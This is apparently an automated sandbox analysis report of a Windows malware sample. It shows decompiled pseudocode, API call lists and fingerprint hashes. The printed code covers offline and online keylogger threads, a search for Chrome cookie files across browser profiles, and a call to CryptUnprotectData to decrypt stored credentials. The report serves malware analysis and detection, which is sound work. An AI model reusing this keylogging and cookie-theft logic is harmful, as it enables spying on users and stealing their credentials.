                    0x0044e1f3
                    0x0044e1f5
                    0x0044e1ff
                    0x0044e202
                    0x0044e205
                    0x0044e207
                    0x0044e20a
                    0x0044e20c
                    0x0044e25c
                    0x0044e25f
                    0x0044e25f
                    0x0044e261
                    0x00000000
                    0x0044e20e
                    0x0044e210
                    0x0044e210
                    0x0044e212
                    0x0044e215
                    0x0044e215
                    0x0044e21a
                    0x0044e21d
                    0x0044e21d
                    0x0044e21f
                    0x0044e220
                    0x0044e220
                    0x0044e224
                    0x0044e227
                    0x0044e227
                    0x0044e22a
                    0x0044e22d
                    0x0044e23a
                    0x0044e23f
                    0x0044e242
                    0x0044e244
                    0x0044e27e
                    0x0044e27f
                    0x0044e280
                    0x0044e281
                    0x0044e282
                    0x0044e283
                    0x0044e288
                    0x0044e28c
                    0x0044e28e
                    0x0044e28f
                    0x0044e292
                    0x0044e292
                    0x0044e295
                    0x0044e295
                    0x0044e297
                    0x0044e298
                    0x0044e298
                    0x0044e2a1
                    0x0044e2a2
                    0x0044e2a5
                    0x0044e2a8
                    0x0044e2ab
                    0x0044e2ad
                    0x0044e2b4
                    0x0044e2b6
                    0x0044e2b9
                    0x0044e2c3
                    0x0044e2c6
                    0x0044e2c7
                    0x0044e2c9
                    0x0044e2dd
                    0x0044e2dd
                    0x0044e2e0
                    0x0044e2ea
                    0x0044e2ef
                    0x0044e2f2
                    0x0044e2f4
                    0x00000000
                    0x0044e2f6
                    0x0044e2fa
                    0x0044e303
                    0x0044e309
                    0x00000000
                    0x0044e30c
                    0x0044e2cb
                    0x0044e2cb
                    0x0044e2d1
                    0x0044e2d6
                    0x0044e2d9
                    0x0044e2db
                    0x0044e312
                    0x0044e314
                    0x0044e315
                    0x0044e316
                    0x0044e317
                    0x0044e318
                    0x0044e319
                    0x0044e31e
                    0x0044e321
                    0x0044e322
                    0x0044e324
                    0x0044e32a
                    0x0044e331
                    0x0044e334
                    0x0044e337
                    0x0044e338
                    0x0044e33b
                    0x0044e33c
                    0x0044e33f
                    0x0044e340
                    0x0044e361
                    0x0044e361
                    0x0044e363
                    0x00000000
                    0x00000000
                    0x0044e348
                    0x0044e34a
                    0x0044e34c
                    0x0044e34e
                    0x0044e350
                    0x0044e352
                    0x0044e354
                    0x0044e35f
                    0x00000000
                    0x0044e35f
                    0x0044e354
                    0x0044e350
                    0x00000000
                    0x0044e34c
                    0x0044e365
                    0x0044e367
                    0x0044e36a
                    0x0044e383
                    0x0044e383
                    0x0044e385
                    0x0044e388
                    0x0044e398
                    0x0044e39a
                    0x0044e39a
                    0x0044e38a
                    0x0044e38a
                    0x0044e38d
                    0x00000000
                    0x0044e38f
                    0x0044e38f
                    0x0044e392
                    0x00000000
                    0x0044e394
                    0x0044e394
                    0x0044e394
                    0x0044e392
                    0x0044e38d
                    0x0044e3a8
                    0x0044e3ac
                    0x0044e3ba
                    0x0044e3bf
                    0x0044e3d4
                    0x0044e3d6
                    0x0044e3dc
                    0x0044e3df
                    0x0044e411
                    0x0044e411
                    0x0044e416
                    0x0044e41c
                    0x0044e41c
                    0x0044e423
                    0x0044e43d
                    0x0044e43d
                    0x0044e43e
                    0x0044e444
                    0x0044e44a
                    0x0044e44b
                    0x0044e44c
                    0x0044e451
                    0x0044e454
                    0x0044e456
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044e425
                    0x0044e425
                    0x0044e42b
                    0x0044e42d
                    0x00000000
                    0x0044e42f
                    0x0044e42f
                    0x0044e432
                    0x00000000
                    0x0044e434
                    0x0044e434
                    0x0044e43b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044e43b
                    0x0044e432
                    0x0044e42d
                    0x00000000
                    0x0044e458
                    0x0044e460
                    0x0044e466
                    0x0044e468
                    0x0044e468
                    0x0044e470
                    0x0044e475
                    0x0044e47d
                    0x0044e480
                    0x0044e482
                    0x0044e496
                    0x0044e49b
                    0x0044e3e1
                    0x0044e3e1
                    0x0044e3e2
                    0x0044e3e3
                    0x0044e3e4
                    0x0044e3e5
                    0x0044e3ed
                    0x0044e3ed
                    0x0044e3ed
                    0x0044e3ef
                    0x0044e3f2
                    0x0044e3f5
                    0x0044e3f5
                    0x0044e36c
                    0x0044e36f
                    0x0044e371
                    0x00000000
                    0x0044e373
                    0x0044e373
                    0x0044e376
                    0x0044e377
                    0x0044e378
                    0x0044e379
                    0x0044e37e
                    0x0044e371
                    0x0044e3fd
                    0x0044e402
                    0x0044e40d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044e2db
                    0x0044e2af
                    0x0044e2b1
                    0x0044e30d
                    0x0044e311
                    0x0044e311
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044e246
                    0x0044e249
                    0x0044e24c
                    0x0044e24f
                    0x0044e252
                    0x0044e255
                    0x0044e258
                    0x0044e258
                    0x00000000
                    0x0044e215
                    0x0044e1f7
                    0x0044e1f7
                    0x0044e263
                    0x0044e265
                    0x00000000
                    0x0044e26a
                    0x0044e139
                    0x0044e139
                    0x0044e13c
                    0x0044e145
                    0x0044e148
                    0x0044e14f
                    0x0044e151
                    0x0044e16a
                    0x0044e16b
                    0x0044e16c
                    0x0044e16e
                    0x0044e173
                    0x0044e153
                    0x0044e153
                    0x0044e156
                    0x0044e157
                    0x0044e159
                    0x0044e15b
                    0x0044e15d
                    0x0044e162
                    0x0044e162
                    0x0044e176
                    0x0044e178
                    0x0044e17a
                    0x00000000
                    0x00000000
                    0x0044e180
                    0x0044e183
                    0x0044e185
                    0x0044e187
                    0x00000000
                    0x0044e189
                    0x0044e189
                    0x0044e18c
                    0x00000000
                    0x0044e18c
                    0x00000000
                    0x0044e187
                    0x0044e26b
                    0x0044e26e
                    0x0044e273
                    0x00000000
                    0x0044e276
                    0x0044e109
                    0x0044e109
                    0x0044e110
                    0x0044e111
                    0x0044e113
                    0x0044e118
                    0x0044e277
                    0x0044e27b
                    0x0044e27b
                    0x00000000

                    APIs
                    • _strpbrk.LIBCMT ref: 0044E148
                    • _free.LIBCMT ref: 0044E265
                      • Part of subcall function 0043B6DD: IsProcessorFeaturePresent.KERNEL32(00000017,0043B6AF,0040F60D,?,?,00000000,0040F60D,00000000,?,?,0043B6CF,00000000,00000000,00000000,00000000,00000000), ref: 0043B6DF
                      • Part of subcall function 0043B6DD: GetCurrentProcess.KERNEL32(C0000417,?,0040F60D), ref: 0043B701
                      • Part of subcall function 0043B6DD: TerminateProcess.KERNEL32(00000000,?,0040F60D), ref: 0043B708
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                    • String ID: *?$.
                    • API String ID: 2812119850-3972193922
                    • Opcode ID: 0108fa4249c84fb78faf32389ed70827ec290ef28504d2e7bfca600ea1d312de
                    • Instruction ID: 58a0db354b655eee59e30895a251123988b513a3e49416fd032f186430e4d5c6
                    • Opcode Fuzzy Hash: 0108fa4249c84fb78faf32389ed70827ec290ef28504d2e7bfca600ea1d312de
                    • Instruction Fuzzy Hash: 0051B471D00109DFEF14DFAAC881AAEB7B5FF48314F2441AEE844E7341D6799E018B54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E00415EFF(void* __ebp, void* __eflags, char _a16, void* _a152, void* _a176) {
                    				intOrPtr* _t17;
                    				signed char* _t19;
                    				void* _t22;
                    				void* _t24;
                    				void* _t29;
                    
                    				asm("sbb eax, 0x474124");
                    				if(__eflags != 0) {
                    					E0040A030(_t29, 0x4740d8, __eflags);
                    				} else {
                    					 *0x474124 = (E0043B4CB( *0x474128) != 0) + 1;
                    					_t57 = E00401FAB(0x4742d8);
                    					E00413425(0x4742d8, _t14, "okmode", (E0043B4CB( *0x474128) != 0) + 1);
                    					_t17 = E00401FAB(E00401E65(0x4740cc, _t14, __ebp, E0043B4CB( *0x474128), 0xb));
                    					_t19 = E00401FAB(E00401E65(0x4740cc, _t14, __ebp, E0043B4CB( *0x474128), 0x10));
                    					_t67 =  *_t17;
                    					_t22 = E0043B4A1(_t20, E00401FAB(E00401E65(0x4740cc, _t14, __ebp,  *_t17, 7)));
                    					_t24 = E00401FAB(E00401E65(0x4740cc, _t14, __ebp,  *_t17, 0x11));
                    					E00409D0B( *_t17, 0x4740d8, _t67,  *0x474124,  *0x474128,  *_t19 & 0x000000ff, E00401FAB(E00401E65(0x4740cc, _t57, __ebp,  *_t17, 0x31)), _t24, _t22, (_t18 & 0xffffff00 |  *_t17 != 0x00000000) & 0x000000ff);
                    				}
                    				_t5 =  &_a16; // 0x404421
                    				E00401E8D(_t5, _t57);
                    				E00401FD8();
                    				E00401FD8();
                    				return 0;
                    			}








                    0x00415eff
                    0x00415f04
                    0x00415fcd
                    0x00415f0a
                    0x00415f1f
                    0x00415f34
                    0x00415f36
                    0x00415f4d
                    0x00415f5f
                    0x00415f64
                    0x00415f80
                    0x00415f92
                    0x00415fbe
                    0x00415fbe
                    0x00416b20
                    0x00416b24
                    0x00416b30
                    0x00416b3c
                    0x00416b49

                    APIs
                    • _wcslen.LIBCMT ref: 00415F10
                      • Part of subcall function 00413425: RegCreateKeyA.ADVAPI32(80000001,00000000,00465094), ref: 00413433
                      • Part of subcall function 00413425: RegSetValueExA.KERNEL32(00465094,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040BFC7,00465C30,00000001,000000AF,00465094), ref: 0041344E
                      • Part of subcall function 00413425: RegCloseKey.ADVAPI32(00465094,?,?,?,0040BFC7,00465C30,00000001,000000AF,00465094), ref: 00413459
                      • Part of subcall function 00409D0B: _wcslen.LIBCMT ref: 00409D24
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcslen$CloseCreateValue
                    • String ID: !D@$X2}$okmode
                    • API String ID: 3411444782-4256138419
                    • Opcode ID: 713ba7559629b13bb70190ba46cc0a1eb97d2752a3e52e89eeb197e630f9a060
                    • Instruction ID: a9b945f17cbe5e25e28f864f6edf5880a33dc2cffa344bc7f53269ec1de3d8da
                    • Opcode Fuzzy Hash: 713ba7559629b13bb70190ba46cc0a1eb97d2752a3e52e89eeb197e630f9a060
                    • Instruction Fuzzy Hash: EB11B4717482011ADA187B32D826ABD22968FE4754F80443FF54AEB6E2DF3C4C91934D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E0040C461(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				int _t22;
                    				int _t32;
                    				void* _t59;
                    				void* _t63;
                    				void* _t64;
                    				void* _t66;
                    				void* _t67;
                    
                    				_t59 = __edx;
                    				_t40 = __ebx;
                    				_t63 = __ecx;
                    				E0040C7BE(__ecx);
                    				E0040C338(__ebx,  &_v52, _t59, __ecx, __eflags);
                    				E00409082( &_v28,  &_v52, _t67, L"User Data\\Default\\Network\\Cookies");
                    				_t22 = PathFileExistsW(E00401F04( &_v28));
                    				_t69 = _t22;
                    				if(_t22 != 0) {
                    					E0040C71F(__ebx, _t63, _t67, _t69,  &_v28);
                    				}
                    				E00401F13( &_v28,  &_v52, _t64, E00409082( &_v76,  &_v52, _t67, L"User Data\\Profile ?\\Network\\Cookies"));
                    				E00401F09();
                    				_t66 = 1;
                    				do {
                    					_push(E0041B69C(_t40,  &_v76, _t66));
                    					E0040C7C8(E0040247C() - 0x11,  &_v76);
                    					E00401F09();
                    					_t32 = PathFileExistsW(E00401F04( &_v28));
                    					_t71 = _t32;
                    					if(_t32 != 0) {
                    						E0040C71F(_t40, _t63, _t67, _t71,  &_v28);
                    					}
                    					_t66 = _t66 + 1;
                    				} while (_t66 < 0x64);
                    				E00401F09();
                    				E00401F09();
                    				return _t63;
                    			}
















                    0x0040c461
                    0x0040c461
                    0x0040c469
                    0x0040c46b
                    0x0040c473
                    0x0040c483
                    0x0040c492
                    0x0040c498
                    0x0040c49a
                    0x0040c4a2
                    0x0040c4a2
                    0x0040c4bc
                    0x0040c4c4
                    0x0040c4cb
                    0x0040c4cc
                    0x0040c4d6
                    0x0040c4e7
                    0x0040c4ef
                    0x0040c4fd
                    0x0040c503
                    0x0040c505
                    0x0040c50d
                    0x0040c50d
                    0x0040c512
                    0x0040c513
                    0x0040c51b
                    0x0040c523
                    0x0040c52f

                    APIs
                      • Part of subcall function 0040C338: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,0040C478), ref: 0040C36B
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C492
                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C4FD
                    Strings
                    • User Data\Default\Network\Cookies, xrefs: 0040C478
                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C4A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                    • API String ID: 1174141254-1980882731
                    • Opcode ID: 303559b0e75a489d98961c69d4a5b8cf5f3fc23c36ec2bb2d1d1220df97e0d80
                    • Instruction ID: 56c6be8764c36b87fa98730c1e299b11f32f91b77b5cb6fb4540f0d34fecd27a
                    • Opcode Fuzzy Hash: 303559b0e75a489d98961c69d4a5b8cf5f3fc23c36ec2bb2d1d1220df97e0d80
                    • Instruction Fuzzy Hash: 6221127191011A9ACB04F7A6DC96CEEB778AE50719B40013FF602B31D2EF789946C698
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E0040A0A0(void* __ecx, char* __edx, char _a4) {
                    				char _v28;
                    				char _v32;
                    				void* _v56;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				void* _t22;
                    				void* _t40;
                    				void* _t42;
                    				signed int _t43;
                    				void* _t45;
                    
                    				_t34 = __edx;
                    				_t45 = (_t43 & 0xfffffff8) - 0x1c;
                    				_push(_t22);
                    				_t40 = __ecx;
                    				 *((char*)(__ecx + 0x49)) = 1;
                    				E0040B761(__ecx + 0x68,  &_a4);
                    				_t49 =  *((intOrPtr*)(__ecx + 0x4c)) - 2;
                    				_t36 = "Offline Keylogger Started";
                    				if( *((intOrPtr*)(__ecx + 0x4c)) != 2) {
                    					E00402093(_t22,  &_v28, __edx, _t42, "Offline Keylogger Started");
                    					_t45 = _t45 - 0x18;
                    					_t34 =  &_v32;
                    					E0041B6F3(_t45,  &_v32);
                    					E0040AFD9(_t22, _t40, _t49);
                    					E00401FD8();
                    				}
                    				_t46 = _t45 - 0x18;
                    				E00402093(_t22, _t45 - 0x18, _t34, _t42, _t36);
                    				E00402093(_t22, _t46 - 0x18, _t34, _t42, "i");
                    				E0041AF84(_t22, _t36);
                    				CreateThread(0, 0, E0040A1A4, _t40, 0, 0);
                    				if( *_t40 == 0) {
                    					CreateThread(0, 0, E0040A18E, _t40, 0, 0);
                    				}
                    				CreateThread(0, 0, E0040A1B0, _t40, 0, 0);
                    				return E00401F09();
                    			}














                    0x0040a0a0
                    0x0040a0a6
                    0x0040a0ac
                    0x0040a0ae
                    0x0040a0b5
                    0x0040a0b9
                    0x0040a0be
                    0x0040a0c2
                    0x0040a0c7
                    0x0040a0ce
                    0x0040a0d3
                    0x0040a0d6
                    0x0040a0dc
                    0x0040a0e3
                    0x0040a0ec
                    0x0040a0ec
                    0x0040a0f1
                    0x0040a0f7
                    0x0040a106
                    0x0040a10b
                    0x0040a125
                    0x0040a129
                    0x0040a135
                    0x0040a135
                    0x0040a141
                    0x0040a151

                    APIs
                    • CreateThread.KERNEL32 ref: 0040A125
                    • CreateThread.KERNEL32 ref: 0040A135
                    • CreateThread.KERNEL32 ref: 0040A141
                      • Part of subcall function 0040AFD9: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040AFE7
                      • Part of subcall function 0040AFD9: wsprintfW.USER32 ref: 0040B068
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread$LocalTimewsprintf
                    • String ID: Offline Keylogger Started
                    • API String ID: 465354869-4114347211
                    • Opcode ID: ca5bfb9c3802c6bb9b9541fae52ae20777c643e7d4f28a8887f711fa26b33291
                    • Instruction ID: 2d3fdd7e74b68ddec4737a7b042a8fd1860249a95f1e418d68bb9cbce41282d3
                    • Opcode Fuzzy Hash: ca5bfb9c3802c6bb9b9541fae52ae20777c643e7d4f28a8887f711fa26b33291
                    • Instruction Fuzzy Hash: 9C1198B11003087ED220B6368C86DBB765CDA9139CF40057EF546265D2DA785D54CAFB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E0040AD63(void* __ecx, void* __edx) {
                    				char _v28;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				void* _t7;
                    				void* _t18;
                    				void* _t31;
                    				void* _t32;
                    				void* _t33;
                    
                    				_t31 = __ecx;
                    				_t38 =  *((char*)(__ecx + 0x4a));
                    				if( *((char*)(__ecx + 0x4a)) == 0) {
                    					 *((char*)(__ecx + 0x4a)) = 1;
                    					E00402093(_t18,  &_v28, __edx, _t32, "Online Keylogger Started");
                    					_t34 = _t33 - 0x18;
                    					E0041B6F3(_t33 - 0x18,  &_v28);
                    					E0040AFD9(_t18, _t31, _t38);
                    					E00401FD8();
                    					E00402093(_t18, _t34 - 0x18,  &_v28, _t32, "Online Keylogger Started");
                    					E00402093(_t18, _t34,  &_v28, _t32, "i");
                    					E0041AF84(_t18, "Online Keylogger Started");
                    					if( *((intOrPtr*)(_t31 + 0x49)) == 0) {
                    						if( *_t31 == 0) {
                    							CreateThread(0, 0, E0040A18E, _t31, 0, 0);
                    						}
                    						CreateThread(0, 0, E0040A1B0, _t31, 0, 0);
                    					}
                    					return CreateThread(0, 0, E0040A1BC, _t31, 0, 0);
                    				}
                    				return _t7;
                    			}












                    0x0040ad6b
                    0x0040ad6e
                    0x0040ad72
                    0x0040ad7d
                    0x0040ad85
                    0x0040ad8a
                    0x0040ad92
                    0x0040ad99
                    0x0040ada1
                    0x0040adac
                    0x0040adbb
                    0x0040adc0
                    0x0040add3
                    0x0040add7
                    0x0040ade3
                    0x0040ade3
                    0x0040adef
                    0x0040adef
                    0x00000000
                    0x0040adfb
                    0x0040ae03

                    APIs
                      • Part of subcall function 0040AFD9: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040AFE7
                      • Part of subcall function 0040AFD9: wsprintfW.USER32 ref: 0040B068
                      • Part of subcall function 0041AF84: GetLocalTime.KERNEL32(00000000), ref: 0041AF9E
                    • CreateThread.KERNEL32 ref: 0040ADE3
                    • CreateThread.KERNEL32 ref: 0040ADEF
                    • CreateThread.KERNEL32 ref: 0040ADFB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread$LocalTime$wsprintf
                    • String ID: Online Keylogger Started
                    • API String ID: 112202259-1258561607
                    • Opcode ID: 5eed85fe4d92cb402e46d65993739325692eb802d749dbd3c13eb38023ace746
                    • Instruction ID: 32b8ae355a5eec64bb9b7a1f750592c04035d06577fa3261d1d90c406113edcc
                    • Opcode Fuzzy Hash: 5eed85fe4d92cb402e46d65993739325692eb802d749dbd3c13eb38023ace746
                    • Instruction Fuzzy Hash: 7101A1A06003183AE62072764C86DBF7E2ECA81399F40057EFA42265C299B85C5586FB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 28%
                    			E0040698A(intOrPtr __ecx, char __edx, char* _a4) {
                    				intOrPtr _v8;
                    				char _v12;
                    				intOrPtr _v16;
                    				char _v20;
                    				_Unknown_base(*)()* _t11;
                    				intOrPtr _t18;
                    				intOrPtr _t24;
                    				char* _t26;
                    				void* _t29;
                    				char* _t32;
                    
                    				_t11 =  *0x471af4; // 0x0
                    				_v16 = __ecx;
                    				_v20 = __edx;
                    				if(_t11 == 0) {
                    					_t11 = GetProcAddress(LoadLibraryA("crypt32"), "CryptUnprotectData");
                    					 *0x471af4 = _t11;
                    				}
                    				_push( &_v12);
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				_push( &_v20);
                    				if( *_t11() == 0) {
                    					return 0;
                    				} else {
                    					_t24 = _v12;
                    					_t26 = _a4;
                    					if(_t24 == 0) {
                    						L7:
                    						 *((char*)(_t24 + _t26)) = 0;
                    						return _v12;
                    					}
                    					_t32 = _t26;
                    					_t29 = _v8 - _t26;
                    					_t18 = _t24;
                    					do {
                    						 *_t32 =  *((intOrPtr*)(_t29 + _t32));
                    						_t32 = _t32 + 1;
                    						_t18 = _t18 - 1;
                    					} while (_t18 != 0);
                    					goto L7;
                    				}
                    			}













                    0x00406990
                    0x00406995
                    0x00406998
                    0x0040699d
                    0x004069b0
                    0x004069b6
                    0x004069b6
                    0x004069be
                    0x004069c1
                    0x004069c2
                    0x004069c3
                    0x004069c4
                    0x004069c5
                    0x004069c9
                    0x004069ce
                    0x00000000
                    0x004069d0
                    0x004069d0
                    0x004069d3
                    0x004069d8
                    0x004069f4
                    0x004069f4
                    0x00000000
                    0x004069f8
                    0x004069e0
                    0x004069e2
                    0x004069e4
                    0x004069e6
                    0x004069e9
                    0x004069eb
                    0x004069ec
                    0x004069ec
                    0x00000000
                    0x004069f3

                    APIs
                    • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406952,?), ref: 004069A9
                    • GetProcAddress.KERNEL32(00000000), ref: 004069B0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: CryptUnprotectData$crypt32
                    • API String ID: 2574300362-2380590389
                    • Opcode ID: 06d76b66c6d8b524bb024e6719276ac726612a4fcbd05f9a57315d8cd4c13153
                    • Instruction ID: 292758b17ce487e1edff92425ab2cba0e124db5af18d7ec287762ce0a799def5
                    • Opcode Fuzzy Hash: 06d76b66c6d8b524bb024e6719276ac726612a4fcbd05f9a57315d8cd4c13153
                    • Instruction Fuzzy Hash: 9001D875A05206ABCB188FADDC549AFBFB8AF44300F15427EE856E3781DA74D9008794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E0041A7AC(void* __ebx) {
                    				char _v28;
                    				void* __ebp;
                    				void* _t28;
                    				void* _t29;
                    				void* _t36;
                    				signed int _t37;
                    				void* _t39;
                    
                    				_t39 = (_t37 & 0xfffffff8) - 0x1c;
                    				E0040D7F1( &_v28, 0x30, "alarm.wav");
                    				if(PathFileExistsW(E00401F04( &_v28)) != 0) {
                    					L7:
                    					E0041A855(E00401F04( &_v28));
                    				} else {
                    					if(E00405B05(0x465094) == 0) {
                    						E0041BF87(0x474950, E00401F04( &_v28));
                    						goto L7;
                    					} else {
                    						_t43 =  *0x473ad2;
                    						_t28 = _t39 - 0x18;
                    						_push(0x46b914);
                    						if( *0x473ad2 == 0) {
                    							E00402093(__ebx, _t28, 0x465094, _t36);
                    							_t29 = 0x474580;
                    						} else {
                    							E00402093(__ebx, _t28, 0x465094, _t36);
                    							_t29 = 0x474968;
                    						}
                    						_push(0xa1);
                    						E00404AA1(_t29, 0x465094, _t43);
                    					}
                    				}
                    				return E00401F09();
                    			}










                    0x0041a7b2
                    0x0041a7c1
                    0x0041a7d9
                    0x0041a837
                    0x0041a842
                    0x0041a7db
                    0x0041a7ee
                    0x0041a832
                    0x00000000
                    0x0041a7f0
                    0x0041a7f3
                    0x0041a7fa
                    0x0041a7fc
                    0x0041a801
                    0x0041a80f
                    0x0041a814
                    0x0041a803
                    0x0041a803
                    0x0041a808
                    0x0041a808
                    0x0041a819
                    0x0041a81e
                    0x0041a81e
                    0x0041a7ee
                    0x0041a854

                    APIs
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0041A7D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: PIG$alarm.wav$hIG
                    • API String ID: 1174141254-363264919
                    • Opcode ID: a5e0430204f3857d1aaf6b0dd3ef2f078b488588d249127c5638b20a89425a5b
                    • Instruction ID: 1ae50bae2ae6ed4a984e86cb2879d34e903847a89473a96c64d13eb8af63a412
                    • Opcode Fuzzy Hash: a5e0430204f3857d1aaf6b0dd3ef2f078b488588d249127c5638b20a89425a5b
                    • Instruction Fuzzy Hash: FC01D27070430156CA08B63588176EA37458B80718F10847FB68A662D2FF7C9996C6DF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E0040515C() {
                    				void* __ebx;
                    				void* __ecx;
                    				long _t19;
                    				void* _t24;
                    				intOrPtr _t28;
                    				void* _t29;
                    				void* _t30;
                    				void* _t31;
                    				void* _t32;
                    				void* _t33;
                    				intOrPtr _t40;
                    
                    				_t31 = _t24;
                    				 *((intOrPtr*)(_t31 + 0x78)) = 0;
                    				if( *((intOrPtr*)(_t31 + 0x74)) <= 0) {
                    					L3:
                    					 *((char*)(_t31 + 0x5c)) = 0;
                    					_t40 =  *0x471d48; // 0x0
                    					if(_t40 != 0) {
                    						_t34 = _t33 - 0x18;
                    						E00402093(0, _t33 - 0x18, _t29, _t32, "Connection Timeout");
                    						E00402093(0, _t34 - 0x18, _t29, _t32, "E");
                    						E0041AF84(0, _t30);
                    					}
                    					E00404E26(_t29);
                    					return 1;
                    				} else {
                    					goto L1;
                    				}
                    				while(1) {
                    					L1:
                    					_t19 = WaitForSingleObject( *(_t31 + 0x60), 0x3e8);
                    					 *((intOrPtr*)(_t31 + 0x78)) =  *((intOrPtr*)(_t31 + 0x78)) + 1;
                    					_t28 =  *((intOrPtr*)(_t31 + 0x78));
                    					if(_t19 == 0) {
                    						break;
                    					}
                    					if(_t28 <  *((intOrPtr*)(_t31 + 0x74))) {
                    						continue;
                    					}
                    					goto L3;
                    				}
                    				CloseHandle( *(_t31 + 0x60));
                    				 *(_t31 + 0x60) = 0;
                    				 *((char*)(_t31 + 0x5c)) = 0;
                    				SetEvent( *(_t31 + 0x64));
                    				return 0;
                    			}














                    0x0040515f
                    0x00405163
                    0x00405169
                    0x00405188
                    0x00405188
                    0x0040518b
                    0x00405191
                    0x00405193
                    0x0040519d
                    0x004051ac
                    0x004051b1
                    0x004051b6
                    0x004051bb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040516b
                    0x0040516b
                    0x00405173
                    0x00405179
                    0x0040517c
                    0x00405181
                    0x00000000
                    0x00000000
                    0x00405186
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405186
                    0x004051ca
                    0x004051d3
                    0x004051d6
                    0x004051d9
                    0x00000000

                    APIs
